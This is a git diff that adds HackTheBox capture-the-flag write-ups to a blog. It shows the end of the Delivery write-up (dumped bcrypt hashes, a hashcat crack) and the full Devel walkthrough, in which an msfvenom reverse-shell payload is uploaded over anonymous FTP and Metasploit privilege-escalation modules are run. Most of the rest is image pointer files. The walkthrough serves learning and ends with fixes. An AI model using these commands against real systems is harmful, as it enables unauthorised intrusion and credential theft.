| 0 | | +| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | 9122359@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| jing8rk6mjdbudcidw6wz94rdy | 1608992663664 | 1608992663664 | 0 | channelexport | | NULL | | channelexport@localhost | 0 | | Channel Export Bot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663664 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | 5056505@delivery.htb | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +8 rows in set (0.000 sec) +``` +In this table I find the hash of the user, I recover it and launch `hashcat` to crack it: + + +```bash +hashcat.exe -m 3200 hash.txt pass.txt -r rules/best64.rule +hashcat (v6.2.5) starting +[...] +Hashes: 1 digests; 1 unique digests, 1 unique salts +Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates +Rules: 77 + +Optimizers applied: +* Zero-Byte +* Single-Hash +* Single-Salt + +[...] + +Dictionary cache hit: +* Filename..: pass.txt +* Passwords.: 1 +* Bytes.....: 17 +* Keyspace..: 77 + +$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 + +[...] +``` +💡To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time.I find the `PleaseSubscribe!21` password so I can now change the user to root and get the last flag. + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Disable account creation on Matermost +- Do not send a clear password in conversations +- Do not use the root password on other services/for other users +- Use complex passwords diff --git a/content/writeup-ctf/writeup-devel-htb/featured.png b/content/writeup-ctf/writeup-devel-htb/featured.png new file mode 100644 index 0000000..7549676 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b07b596f0884e42218d26c85f34c5597ba8d8550c98909073c3f4ebac12fcef2 +size 264178 diff --git a/content/writeup-ctf/writeup-devel-htb/featured.webp b/content/writeup-ctf/writeup-devel-htb/featured.webp new file mode 100644 index 0000000..67e28c2 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cfcb5ec28db1d22d860b5ac6aa40d0de2c4fd7ad30ce600fb7786e28319fc968 +size 28504 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.png b/content/writeup-ctf/writeup-devel-htb/img/image-1.png new file mode 100644 index 0000000..b24dbdd --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9971d86a22c91e29fc54bf15b7c86f08bba62dc1223f68dd0291f3bcc4608b3 +size 34053 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.webp b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp new file mode 100644 index 0000000..860454d --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a870b5e62fbc6a8c590b6eff3753495b978cf5cb4ecdafd75168defdf035189b +size 31926 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.png b/content/writeup-ctf/writeup-devel-htb/img/image-2.png new file mode 100644 index 0000000..bb55ca5 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ee4219aec1d3c4658a830d5c5695e0eb72c8527ae912e36a53d333b63f899d1 +size 270053 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.webp b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp new file mode 100644 index 0000000..c5bfd22 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e743eb6604bbdf14cf343a8979d515bc907dc6e5bea6a051915ab2296d3b17e5 +size 22534 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.png b/content/writeup-ctf/writeup-devel-htb/img/image-3.png new file mode 100644 index 0000000..2da01ce --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebdfa8162e394ed0a0fb48b4375619a31cb6e0df14b037e76b98eb1d592e66cc +size 26161 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.webp b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp new file mode 100644 index 0000000..4b97f19 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0e8cc572cd8804b21634a7fc704c1d06d0ed4292b630348add66533cb85a58d +size 28084 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.png b/content/writeup-ctf/writeup-devel-htb/img/image-4.png new file mode 100644 index 0000000..9449455 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ac67e6c1ef6f032b4b1b8056ed033665aeb27c46fb97a9e07d73f4f46c93f8b +size 50008 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.webp b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp new file mode 100644 index 0000000..6eb2f6b --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba8c917a1b476e9e887170e609e6448946843d29a3471ba996fa944f5549357a +size 45758 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.png b/content/writeup-ctf/writeup-devel-htb/img/image-5.png new file mode 100644 index 0000000..3427ba1 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b11ea53fd4b83e13861601723e90c3360c4cda00249327c423dacf9acfe6df7 +size 67853 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.webp b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp new file mode 100644 index 0000000..4aef72e --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:789160158ced23789b850d1bd2d8f9d8d9e21492517ba314bd988ec380ddf580 +size 81996 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.png b/content/writeup-ctf/writeup-devel-htb/img/image-6.png new file mode 100644 index 0000000..c75d9b8 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e07b654f84970e5efc61fbca2df742f136f6601c187cbb8839c51310f60de898 +size 14620 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.webp b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp new file mode 100644 index 0000000..13c90ba --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eec38bdbcb6ac2f1153abb2b57dcf97b0a983802bfcd59f33492ed6703677d32 +size 15820 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.png b/content/writeup-ctf/writeup-devel-htb/img/image-7.png new file mode 100644 index 0000000..4210f07 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5f19166c3e44fcf3d4560e0816fb3fa6d6b6c420ee697e4d39914c1c465024e +size 36563 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.webp b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp new file mode 100644 index 0000000..c3fa9bd --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35fe2fad9d335311e46700d95df3d15e871daad5dedc2132cf80863605df9378 +size 35924 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.png b/content/writeup-ctf/writeup-devel-htb/img/image-8.png new file mode 100644 index 0000000..d539953 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44aa401da6b330d9175ca299fba9c5c46400d07554b4d6baf7e66ef9ae731b3f +size 8233 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.webp b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp new file mode 100644 index 0000000..cbf93bc --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6e6959df3fd4801b88b6a131a4ebaebde30de79c39ea6f1c7fd8db438f0e9d7 +size 11526 diff --git a/content/writeup-ctf/writeup-devel-htb/index.md b/content/writeup-ctf/writeup-devel-htb/index.md new file mode 100644 index 0000000..c62d179 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/index.md @@ -0,0 +1,101 @@ +--- +title: "Writeup - Devel (HTB)" +date: 2022-04-06 +slug: "writeup-devel-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.5 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP (ftpd) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +I start by seeing if it is possible to connect to FTP as `anonymous`: + +![](img/image-3.webp) + +In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command: + + +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx +``` +I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter. + +![](img/image-4.webp) + +I then access my previously uploaded payload at the following address: + + +```bash +http://10.10.10.5/shell.aspx +``` +I now have a reverse shell on the machine. + +## Privilege escalation + +I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit. + + +```bash +use post/multi/recon/local_exploit_suggester +set SESSION 19 +exploit +``` +The module has found a number of potential exploits. + +![](img/image-5.webp) + +I start by testing the first one: + + +```bash +use windows/local/bypassuac_eventtvwr +set SESSION 19 +exploit +``` +![](img/image-6.webp) + +But without success. I test the second one: + + +```bash +use windows/local/ms10_015_kitrap0d +set SESSION 19 +exploit +``` +![](img/image-7.webp) + +This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization. + +The module `MS10_015` is linked to CVE-2010-0232. + + +> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/) + +I can now get both flags back. + +![](img/image-8.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Disable writing to the FTP server as `anonymous` +- Update Windows to patch CVE-2010-0232 diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.png b/content/writeup-ctf/writeup-devzat-htb/featured.png new file mode 100644 index 0000000..ff24998 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144600e92936143f0fe608db542b95f4381f92909e17c643c18f6667e6f07943 +size 281336 diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.webp b/content/writeup-ctf/writeup-devzat-htb/featured.webp new file mode 100644 index 0000000..3bd8615 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9808b0b466c9762b7b349334f1781988859af6841008e21c63053024b0295eae +size 31188 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.png b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png new file mode 100644 index 0000000..b4972c1 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e15e9e79e955e6ee8a75ec685ae92f21c83e903e85a214b0f069e294f0ce9384 +size 64014 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp new file mode 100644 index 0000000..00bda40 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3cbb9260a766aa3f13ed9f97a8bea560b5bf19f6ee32afbdfad1a197ff3d8307 +size 52534 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.png b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png new file mode 100644 index 0000000..bfee383 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:777783cd86154934fc935c9d9a67c8d20aa51cf6eee9219a42017b633246f243 +size 114335 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp new file mode 100644 index 0000000..bd5fe51 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb00365a298976759d8d69ee34e96d03202e49b29e9257fe2e25df3c64e92be1 +size 80786 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.png b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png new file mode 100644 index 0000000..a3b4948 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf71e8c0e877da9776fe1160d0f4ce61be5edb3e08a4e64d62fecfa645e6df07 +size 58946 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp new file mode 100644 index 0000000..777c18f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee7a8ace3ec07d9d266a45ccdcf649865acafa97d01178c801d2330d1e0513bf +size 43894 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.png b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png new file mode 100644 index 0000000..f069773 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7c042a328f0a91533f110ee27898408da3638fadb60fd2a9539718c918b7f39 +size 18289 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp new file mode 100644 index 0000000..0e44171 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ca494592b5f6f76d699a3bbcbcbcab65fa986794854a06e113282fc55d3d374 +size 13576 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.png b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png new file mode 100644 index 0000000..7f8cdfe --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04483aff847e9ce6169d33c2a43cd26c80b4133197e3f11d972f467fb905dc20 +size 38467 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp new file mode 100644 index 0000000..cc43837 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:989c9ac54bc2c88eb6d1df43109849fa5937e9c77ee991055fb14545b10ab920 +size 33548 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.png b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png new file mode 100644 index 0000000..5a24ce1 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4ec696ca7c83a5a82fbdf3d9d4daa87d541ead3f75f5b283b9a0bbd8ec09f3d +size 41992 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp new file mode 100644 index 0000000..a293c27 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ac88a341dbc05c5efc31fb211e298fe37f737606a17e9d8c70023896f8d4b31 +size 36794 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.png b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png new file mode 100644 index 0000000..e30ea8a --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd0b620e2c1049dda53d54280dada89f6f6f1957782d80ecf4bbc65b450e1da1 +size 25129 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp new file mode 100644 index 0000000..5cb06b8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0feb3ab966750a2f236968b4be98bfebebda6cc73723db4bf0ccf9209781152d +size 20074 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.png b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png new file mode 100644 index 0000000..68f83a8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e08b21c2343be3b884f8ab99e101e2994a3adac370c20fd884988685436eaf63 +size 33596 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp new file mode 100644 index 0000000..3927b79 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad63e384624e7538e97b7a88636952dbd0a87527a839f0de4c915000ebe821ed +size 24386 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.png b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png new file mode 100644 index 0000000..1a49eab --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff78724b302de739a495f8ca809cbc9f62e59138b2aaf6e41d45e755f09816d3 +size 32643 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp new file mode 100644 index 0000000..7fb0192 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8b222bc2ca11b707f370a64152da153e826586c21dde35d1af210506c3e7311 +size 24754 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.png b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png new file mode 100644 index 0000000..1738962 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:038c2c776267e011be9fcb47391aee030af615e4c9ddc6fc4bf70f6c2494f44e +size 42126 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp new file mode 100644 index 0000000..9532dff --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23acbb9827aa67cf2acb1ada2da9b840961b8cb6a159a4d58c331c500e7b64e6 +size 26476 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.png b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png new file mode 100644 index 0000000..1be090d --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9182ef227ee64d322a8407b0908043af2be2b30700b8b4854fab6b1e3fbe01b +size 33266 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp new file mode 100644 index 0000000..6248184 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:968437b132c627dac8667448b0078f0e218a0e9dd6d9a279e22fbb1f1bf68e54 +size 19268 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.png b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png new file mode 100644 index 0000000..3dd4f5e --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73836c6a67e3f964d5e613f53fd535b8c3f7031622aa04eeb388720054a4c939 +size 382990 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp new file mode 100644 index 0000000..6931efb --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8761d03d1f8acf2d43242e72249a01493f8f026cbe6d053607eba739298492c +size 39704 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.png b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png new file mode 100644 index 0000000..ae54afa --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3806d9fe10d74312281d70c149fa73d631f8ca6d5c0ac7f25fc4cda132af52fc +size 12982 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp new file mode 100644 index 0000000..bb88016 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79907fee20a0786dcdf92785d2728a3254b4bf7a532f56f4dea85644a351c014 +size 8882 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.png b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png new file mode 100644 index 0000000..9a5b6c4 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:347087792a51be8eab6033604d223e9ae3fd18ee205ad1073b0d5dee9c9e330e +size 35576 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp new file mode 100644 index 0000000..73b93d6 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a824527393c54a6c0805395d7777aef33ac7f918bf94b790aeb843b82c6e012 +size 26130 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.png b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png new file mode 100644 index 0000000..474eeb8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b247084c8c45ae8f71d733c7030532759ff8b56daf800f8ea47ab553db05fc7 +size 9860 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp new file mode 100644 index 0000000..5694eb4 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a0413d88641f2db9d8dd5bcf80222f6180cbf9012553701646bb1324f86931c +size 6848 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.png b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png new file mode 100644 index 0000000..c837761 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83ed834e79aa733ddf2317c01d03d6f7b7a7306e8ea64154d0526a11d0ca0033 +size 59786 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp new file mode 100644 index 0000000..b7b550e --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ee133c38cf87a1e9dfe5695b8c932d12927e1d8c30c8d4c1aacf4162532f11 +size 43230 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.png b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png new file mode 100644 index 0000000..903539f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6cc84579e803eb28b1f9b69971174b0d20fddc242f0d3b62911cd0db1ee351e +size 46238 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp new file mode 100644 index 0000000..0b75384 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:907a08df1efd938e695d158e1d8113ca552c67b3babbad6d2cd0b407de81235c +size 35912 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.png b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png new file mode 100644 index 0000000..323f91f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fed1ef12432ae6a87ef7511adf9003ed331bf1e473f12472d4f74022d233448c +size 87171 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp new file mode 100644 index 0000000..f2f9069 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8fce0da7edd3db130a961543135503a958c269b1c8c3678dc2ef0bb46ba6950 +size 54872 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.png b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png new file mode 100644 index 0000000..14b4141 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:399b6a6ed8b9e5951dca98674afcdde9030696c2ee564cf8b4dd7e4a361d5ca6 +size 31624 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp new file mode 100644 index 0000000..da34d4a --- /dev/null +++ 